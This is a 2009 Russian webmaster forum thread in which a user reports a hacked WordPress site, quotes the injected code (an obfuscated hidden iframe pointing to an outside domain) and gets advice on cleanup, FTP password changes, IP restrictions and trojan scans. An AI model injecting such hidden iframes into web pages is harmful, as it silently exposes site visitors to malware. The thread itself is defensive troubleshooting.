X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Взлом WP 2.7
protrance
protrance
Topic Starter сообщение 30.3.2009, 10:51; Ответить: protrance
Сообщение #1


Участник
***

Группа: User
Сообщений: 162
Регистрация: 5.1.2009
Поблагодарили: 22 раза
Репутация:   1  


Недавно на одном из сателлитов обнаружил в коде следующее
<html><body onload="<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Ftosto-vik.ru%2Findex.php%22%20width%3D%220%22%20height%3D%220%22%20style%3D%22display%3Anone%3B%22%3E%3C%2Fiframe%3E"));</script>"</body></html>
<html><body onload="<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Ftosto-vik.ru%2Findex.php%22%20width%3D%220%22%20height%3D%220%22%20style%3D%22display%3Anone%3B%22%3E%3C%2Fiframe%3E"));</script>"</body></html>

Ну то что этого там не должно быть это понятно. Вопрос - что это? Я как то видел продавали базу сайтов для XSS атак, такой типа черный метод поднятие Тиц. Интересно это оно и есть? Достаточно ли будет просто удалить этот код из файлов? И можно ли пожаловаться на сайт tosto-vik.ru? Или там люди тоже не вкурсе что с троянами сидят.

PS: да и походу палить свои сайты на форуме СЕО бывает не очень разумно ) Может кто свой сайт узнал? Кроме прочего нашел еще файл с ссылками на каталоги.

Сообщение отредактировал protrance - 30.3.2009, 10:58
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
horniest
horniest
сообщение 30.3.2009, 11:03; Ответить: horniest
Сообщение #2


Бывалый
****

Группа: User
Сообщений: 468
Регистрация: 3.4.2008
Поблагодарили: 116 раз
Репутация:   21  


был подобный взлом сайтов у одного хостера. Сразу 3 сайта. Вычищал их потом. В логах есть IP, с которых взлом происходит по ФТП. Необходимо эти IP заблокировать.
У меня трояны грузились
Причем, поражались не только сайты на WP, но и на банальном HTML
Файлы можно вычистить, но нужно IP блокировать.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
protrance
protrance
Topic Starter сообщение 30.3.2009, 11:22; Ответить: protrance
Сообщение #3


Участник
***

Группа: User
Сообщений: 162
Регистрация: 5.1.2009
Поблагодарили: 22 раза
Репутация:   1  


Отчасти радует что это не дырка WP, а как вычислить и где посмотреть эти IP?
Да и еще - я на свой нубкий взгляд не понимаю, как извне, файлы можно открыть и записать в них что то если парва стоят 644?

Сообщение отредактировал protrance - 30.3.2009, 11:25
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
dengol
dengol
сообщение 30.3.2009, 12:27; Ответить: dengol
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 401
Регистрация: 18.3.2008
Из: Москва
Поблагодарили: 88 раз
Репутация:   23  


Cомневаюсь, что блокировка этих ip что-то даст, такие дела как правило делаются через проксик....
Самое грамотное что можно сделать в данном случае, так это разрешить подключение по ftp ТОЛЬКО с ваших IP
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fromnull
fromnull
сообщение 30.3.2009, 12:50; Ответить: fromnull
Сообщение #5


Участник
***


Группа: User
Сообщений: 114
Регистрация: 27.12.2008
Поблагодарили: 13 раз
Репутация:   4  


Было подобное.. Сменить пароли на фтп, убрать анонимных пользователей(бывает, затесываются), проверить комп на трояны(особенно ФТП-клиенты: TotalCMD, Far, Filezilla).
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
psknnn
psknnn
сообщение 30.3.2009, 13:07; Ответить: psknnn
Сообщение #6


( . )( . )
*****

Группа: Active User
Сообщений: 701
Регистрация: 8.8.2008
Поблагодарили: 147 раз
Репутация:   27  


ядро джумла/wp/drupal почти на 100% безопасны при правельной настройке (права на папках)
скорее всего проблема в худом хостере...

большенство взломов проходит либо у тех кто лапухнулся и гдето права 777 оставил... или плагин какой худой поставил.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
protrance
protrance
Topic Starter сообщение 30.3.2009, 13:18; Ответить: protrance
Сообщение #7


Участник
***

Группа: User
Сообщений: 162
Регистрация: 5.1.2009
Поблагодарили: 22 раза
Репутация:   1  


(psknnn @ 30.3.2009, 12:07) *
ядро джумла/wp/drupal почти на 100% безопасны при правельной настройке (права на папках)
скорее всего проблема в худом хостере...

большенство взломов проходит либо у тех кто лапухнулся и гдето права 777 оставил... или плагин какой худой поставил.

Я уже проверил- все зараженные файлы с правами 644., я не знаю как можно специально взять и поставить индекс.пхп права 777?! ! Насчет плагинов - сборка стоит от lecactus, довольно распространенная, лишнего ничего не было. Вспомнили тут за фтп клиент, не знаю связано это было или нет недавно у меня слетел CuteFTP кторым всегда пользовался и я поставил Filezilla.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
agentvini
agentvini
сообщение 30.3.2009, 13:33; Ответить: agentvini
Сообщение #8


wir werden alle sterben
******

Группа: Active User
Сообщений: 1076
Регистрация: 27.5.2008
Из: Москва
Поблагодарили: 234 раза
Репутация:   39  


копайте проблему на своем компьютере. для большей безопасности, могу рекомендовать пользоваться фтп доступом ТОЛЬКО на проверенном антивирусами компьютере. так же не стоит забывать про ц-панель. я к примеру заливаю новые цмс в архиве, потом просто в ц-панель его распаковываю. получается быстро и сердитоsmile.gif


--------------------
Профессиональная разработка сайтов на MODx
реализуем все ваши идеи качественно и быстро
цена от 500$ (skype sanche.s)


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
centurion
centurion
сообщение 30.3.2009, 16:41; Ответить: centurion
Сообщение #9


Топовый постер
*******


Группа: Active User
Сообщений: 2831
Регистрация: 10.12.2007
Из: aceweb
Поблагодарили: 1349 раз
Репутация:   308  


(protrance @ 30.3.2009, 10:51) *
Я как то видел продавали базу сайтов для XSS атак, такой типа черный метод поднятие Тиц. Интересно это оно и есть?

Это не XSS.
У меня такое было на сайте визитке в 15 страниц, полностью HTML, на файлах.
Подгрузился с компьтера по FTP.
Пришлось папку выкачать и руками все удалять из кода каждой страницы.

Сам в этом не понимаю, поэтому сказать - что это не могу.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
inquis
inquis
сообщение 30.3.2009, 17:03; Ответить: inquis
Сообщение #10


Участник
***

Группа: User
Сообщений: 132
Регистрация: 14.7.2008
Поблагодарили: 25 раз
Репутация:   2  


(agentvini @ 30.3.2009, 11:33) *
копайте проблему на своем компьютере. для большей безопасности, могу рекомендовать пользоваться фтп доступом ТОЛЬКО на проверенном антивирусами компьютере. так же не стоит забывать про ц-панель.

А ещё есть такая вещь, как ssh. Больше возможностей и меньше шансов что взломают.
я к примеру заливаю новые цмс в архиве, потом просто в ц-панель его распаковываю. получается быстро и сердитоsmile.gif

Куда проще wget http://сайт_cms/дистрибутив.zip & unzip дистрибутив smile.gif


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Взлом? Брут? DDos?
5 Infacto 669 4.12.2017, 17:11
автор: metvekot


 



RSS Текстовая версия Сейчас: 12.12.2017, 16:37
Дизайн